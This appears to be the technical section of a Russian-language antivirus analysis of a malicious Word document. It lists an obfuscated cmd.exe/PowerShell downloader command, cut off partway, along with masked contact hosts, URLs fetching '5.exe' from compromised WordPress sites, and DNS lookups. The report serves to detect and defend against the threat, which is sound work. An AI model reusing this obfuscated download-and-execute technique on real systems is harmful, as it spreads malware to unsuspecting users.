Техническая информация
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $udPjsiGfQ = 'spaEzNZ';$PJOsZrvw = new-object System.Net.WebClient;$NqaQuzs = 'pxmX4SaQ';$yOKSbC = (New-Object -ComObject word.application...
- 'na####ahorakova.cz':80
- 'bb##ra.de':80
- 'me#.#omsk.ru':80
- 'me#.#omsk.ru':443
- http://www.na####ahorakova.cz/wp-content/plugins/three-column-screen-layout/5.exe?rn######
- http://www.bb##ra.de/wp-content/themes/jupiter/5.exe?rn######
- http://bb##ra.de/wp-content/themes/jupiter/5.exe?rn######
- http://www.me#.#omsk.ru/cache/thumbs/5.exe?rn######
- 'me#.#omsk.ru':443
- DNS ASK na####ahorakova.cz
- DNS ASK bb##ra.de
- DNS ASK me#.#omsk.ru
- DNS ASK ke##vn.com
- DNS ASK kk###use.com
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $udPjsiGfQ = 'spaEzNZ';$PJOsZrvw = new-object System.Net.WebClient;$NqaQuzs = 'pxmX4SaQ';$yOKSbC = (New-Object -ComObject word.application...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding